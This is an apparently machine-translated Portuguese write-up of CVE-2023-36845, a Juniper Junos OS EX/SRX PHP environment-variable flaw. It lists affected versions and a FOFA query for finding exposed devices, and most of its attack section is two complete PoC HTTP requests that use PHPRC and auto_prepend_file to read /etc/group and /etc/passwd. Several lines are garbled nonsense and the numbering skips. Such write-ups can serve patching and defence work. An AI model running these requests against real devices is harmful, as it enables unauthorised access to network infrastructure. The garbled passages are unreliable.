Vulnerabilidade de execução remota de comando Juniper Networks Junos OS EX [CVE-2023-36845]
Isenção de responsabilidade: Por favor, não use as tecnologias relevantes neste artigo para realizar testes ilegais. Quaisquer consequências e perdas diretas ou indiretas causadas pela disseminação e uso das informações ou ferramentas fornecidas neste artigo serão de responsabilidade do próprio usuário. Todos consequências incorridas As consequências adversas não têm nada a ver com o autor do artigo. Este artigo é apenas para fins educacionais.
1: Descrição da vulnerabilidade
Juniper Networks Junos OS EX é um sistema operacional de rede da empresa americana Juniper Networks dedicado aos equipamentos de hardware da empresa. Ele contém uma vulnerabilidade de manipulação de variável de ambiente PHP que afeta firewalls Juniper SRX e switches EX. Um invasor pode executar comandos remotos sem autorização.
2: Versões afetadas pela vulnerabilidade
versão atual < 21.4R3-S5
22.1versão < 22.1R3-S4
22.2versão < 22.2R3-S2
22.3versão < 22.3R2-S2、22.3R3-S1
22.4versão < 22.4R2-S1、22.4R3
23.2versão < 23.2R1-S1、23.2R2
Três: levantamento do ciberespaço e consulta de mapeamento
fofa:title=“Juniper Web Device Manager”
4. Recorrência de vulnerabilidades
1. Reprodução manual
POC1 recorrente
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
auto_prepend_file="/etc/group"
captura de tela do burpsuite
POC2 reproduzido
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
auto_prepend_file="/etc/passwd"
captura de tela do burpsuite
2. Recorrência automatizada
Ferramenta de detecção Xiaolong POC por um tempo
Outro tocante pedaço de vermelho azuki
7. Sugestões de reparo
Versão atualizada
Bloquear execução de código confidencial